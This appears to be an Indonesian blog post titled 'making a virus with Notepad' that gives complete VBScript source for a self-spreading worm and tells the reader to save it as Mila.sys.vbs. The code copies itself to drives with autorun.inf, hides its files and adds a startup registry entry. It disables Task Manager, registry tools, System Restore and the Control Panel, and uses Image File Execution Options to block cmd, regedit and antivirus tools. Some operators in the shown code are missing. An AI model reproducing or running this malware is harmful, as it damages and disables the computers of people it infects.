• MEMBUAT VIRUS DENGAN MEMAKAI NOTEPAD

    MEMBUAT VIRUS DENGAN MEMAKAI NOTEPAD

    1. Buka Notepad
    2. Copy kan kode dibawah ini:

    on error resume next

    dim rekur,syspath,windowpath,desades,
    longka,mf,isi,tf,F0nAb0530,nt,check,sd

    isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe Mila.sys.vbs”

    set longka = createobject(”Scripting.FileSystemObject”)

    set mf = longka.getfile(Wscript.ScriptFullname)

    dim text,size

    size = mf.size

    check = mf.drive.drivetype

    set text = mf.openastextstream(1,-2)

    do while not text.atendofstream

    rekur = rekur & text.readline

    rekur = rekur & vbcrlf

    loop

    do

    Set windowpath = longka.getspecialfolder(0)

    Set syspath = longka.getspecialfolder(1)

    set tf = longka.getfile(syspath & “\recycle.vbs”)

    tf.attributes = 32

    set tf = longka.createtextfile(syspath & “\recycle.vbs”,2,true)

    tf.write rekur

    tf.close

    set tf = longka.getfile(syspath & “\recycle.vbs”)

    tf.attributes = 39

    for each desades in longka.drives

    If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path “A:” then

    set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)

    tf.attributes =32

    set tf=longka.createtextfile(desades.path &”\Mila.sys.vbs”,2,true)

    tf.write rekur

    tf.close

    set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)

    tf.attributes = 39

    set tf =longka.getfile(desades.path &”\autorun.inf”)

    tf.attributes = 32

    set tf=longka.createtextfile(desades.path &”\autorun.inf”,2,true)

    tf.write isi

    tf.close

    set tf = longka.getfile(desades.path &”\autorun.inf”)

    tf.attributes=39

    end if

    next

    set F0nAb0530 = createobject(”WScript.Shell”)

    F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: F0nA ::”

    F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”

    F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”

    F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”

    F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”

    F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”

    F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

    F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

    F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu”, “1″, “REG_DWORD”

    F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper”, “1″, “REG_DWORD”

    F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys”, “1″, “REG_DWORD”

    F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore\DisableSR”, “1″, “REG_DWORD”

    F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”, “1″, “REG_DWORD”

    F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel”, “1″, “REG_DWORD”

    F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a”, “F0nAb0530-X2/1″

    F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList”, “a”

    F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “F0nAb0530-X2″

    F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”, “Aku Sayang Mila”

    F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia”, syspath & “\recycle.vbs”

    F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”, “http://www.macancrew.net”

    F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”“

    F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”“

    F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”“

    F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”“

    F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”“

    F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”“

    F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”“

    F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”“

    F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”“

    F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”“

    F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordpad.exe\Debugger”,”“

    F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VB6.exe\Debugger”,”“

    F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe\Debugger”,”“

    F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger”,”“

    F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger”,”“

    F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger”,”“

    if check 1 then

    Wscript.sleep 200000

    end if

    loop while check 1

    set sd = createobject(”Wscript.shell”)

    sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname

    3. Simpan dengan nama Mila.sys.vbs

0 komentar:

Leave a Reply

Langganan: Posting Komentar (Atom)

farz Gadget